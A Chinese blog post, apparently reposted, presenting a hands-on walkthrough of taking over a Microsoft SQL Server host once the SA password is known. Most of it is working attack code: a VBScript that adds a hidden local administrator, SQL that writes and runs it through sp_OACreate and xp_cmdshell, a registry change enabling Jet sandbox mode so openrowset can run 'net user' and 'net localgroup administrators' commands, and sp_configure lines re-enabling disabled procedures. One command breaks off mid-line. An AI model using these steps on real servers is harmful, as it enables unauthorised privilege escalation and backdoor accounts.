当前位置：首页 > 系统运维 > 正文内容

Microsoft SQL Server SA权限入侵实战演示

a8116255316年前 (2010-07-13)系统运维9

此文章主要向大家描述的是最新Microsoft SQL Server SA权限入侵的实际操作 *** ，同时本文也有对Microsoft SQL Server SA权限入侵的实际操作重要用到的实际应用代码的描述，以下就是文章的主要内容描述。

在获得SA密码后，往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用，无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象，用来管理本地资源，利用它可以不依靠CMD等命令就能添加一个管理员，具体代码如下：

set wsnetwork=CreateObject("WSCRIPT.NETWORK")

os="WinNT://"&wsnetwork.ComputerName

Set ob=GetObject(os) '得到adsi接口,绑定

Set oe=GetObject(os&"/Administrators,group") '属性,admin组

Set od=ob.Create("user","test") '建立用户

od.SetPassword "1234" '设置密码

od.SetInfo '保存

Set of=GetObject(os&"/test",user) '得到用户

oe.add os&"/test"

最新Microsoft SQL Server SA权限入侵 *** ，将上面的代码保存为1.vbs，然后执行，命令为“cscript 1.vbs”，这样就会在系统添加一个系统名为test，密码为1234的用户。具体在查询分析器执行的代码如下：

declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject ("WSCRIPT.NETWORK")' exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. ComputerName' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject (os&"/Administrators,group")' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create ("user","test")' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo ' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject (os&"/test",user) ' exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'

执行完上面的语句，再执行下面这行代码，这行代码一定单独执行，不要与上面的放在一起执行，否则会提示“c:1.vbs正被另一个程序运行”而无法成功添加用户：

exec master..xp_cmdshell 'cscript c:1.vbs'

假如系统用户没有添加成功，有可能是因为系统用户的密码1234的太简单，不符合服务器的复杂密码策略，可以考虑设置的复杂些，然后再测试一下。也可以使用echo将代码写到1.vbs中，代码格式为：

exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK") >>1.vbs'

不过，不知道为什么所有带“&”字符的命令行都无法写入1.vbs，感兴趣的朋友可以尝试解决一下。

使用jet沙盘模式，可以解决XP_cmdshell等存储过程和相关动态链接库带来的烦恼。出于安全原因，系统默认情况下沙盘模式未开启，这就需要xp_regwrite开启沙盘模式：

Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0 Engines','SandBoxMode','REG_Dword',1

然后执行沙盘命令，在系统添加一个用户名为test，密码为1234的用户：

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:windows system32iasias.mdb','select shell("cmd.exe /c net user test 1234 /add")') select * from openrowset('microsoft.jet.oledb.4.0',';database=c:windows system32iasias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")')

不同的操作系统，路径也不一样，需要根据情况做修改：

NT/2K: c:winntsystem32 XP/2003: c:windowssystem32

另外Microsoft sql server2005在默认情况下，一些存储过程是关闭着的，需要命令打开：

开启XP_cmdshell：

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

开启'OPENROWSET'：

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

开启'sp_oacreate':

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp

以上的相关内容就是对最新Microsoft SQL Server SA权限入侵 *** 的介绍，望你能有所收获。

扫描二维码推送至手机访问。

本文链接：http://2345hao.cn/blog/index.php/post/21922.html

标签: 发威击落高市

分享给朋友：

返回列表

上一篇：SQL Server恢复模式的三种类型的比较

下一篇：对SQL Server 2000置疑的正确破解

“Microsoft SQL Server SA权限入侵实战演示” 的相关文章

Microsoft SQL Server SA权限入侵实战演示

“Microsoft SQL Server SA权限入侵实战演示” 的相关文章

windows 7鼠标停顿怎么办？windows 7 usb鼠标停顿的原因以及解决

windows 7系统如何设置休眠时不断网以便继续完成下载

windows 7系统件夹和文件都不显示名字如何解决

Windows7截图出现黑屏导致截的图黑呼呼一片

windows 7如何创建拨号连接

Windows7播放电影视频蓝屏无论什么格式都会蓝屏

最新文章

随机文章

热门文章

ADM与SEC达成和解并支付4000万美元罚金，相关刑事指控被撤销

太意外！美联储，突爆大消息！

AI进化速递 | 摩尔线程发布SimuMax的1.1版本

《赛博朋克2077》创意总监透露DLC结局原本更“黑暗”

英大证券郑后成：A股年内高点大概率位于下半年，要关注周期股

Copyright 2345hao.cn Rights Reserved.琼ICP备2025061540号-1

Powered By Z-BlogPHP. Theme by TOYEAN.

Microsoft SQL Server SA权限入侵实战演示

“Microsoft SQL Server SA权限入侵实战演示” 的相关文章

最新文章

随机文章

热门文章

Copyright 2345hao.cn Rights Reserved.琼ICP备2025061540号-1 LA.init({id:"3OOeBbPou6tNfHXJ",ck:"3OOeBbPou6tNfHXJ"})

Powered By Z-BlogPHP. Theme by TOYEAN.

Copyright 2345hao.cn Rights Reserved.琼ICP备2025061540号-1